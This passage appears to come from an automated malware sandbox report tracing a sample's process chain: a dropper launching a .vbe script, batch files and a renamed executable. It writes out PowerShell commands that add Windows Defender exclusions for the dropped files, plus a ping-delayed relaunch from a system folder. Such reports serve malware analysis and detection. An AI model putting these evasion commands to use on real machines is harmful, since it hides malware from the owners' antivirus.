                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\Accessories\ZWgKQlTqcrSB.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\BridgeSavesMonitor\wW6msodKQlyf4uIuEtxxIN9vzHkuk0mZkwmTg.vbe" Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\BridgeSavesMonitor\PiJ39TM3MwLHVAF8MIz1L5IKE7LQcw3.bat" "Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe "C:\BridgeSavesMonitor/hypersurrogateComponentdhcp.exe"Jump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe'Jump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\ZWgKQlTqcrSB.exe'Jump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\csrss.exe'Jump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\ZWgKQlTqcrSB.exe'Jump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\Accessories\ZWgKQlTqcrSB.exe'Jump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\UV4iXMFwPx.bat" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\TAPI\ZWgKQlTqcrSB.exe "C:\Windows\TAPI\ZWgKQlTqcrSB.exe"
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerp
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B3F654 cpuid 0_2_00B3F654
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00B3AF0F
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeQueries volume information: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe VolumeInformationJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\TAPI\ZWgKQlTqcrSB.exe VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
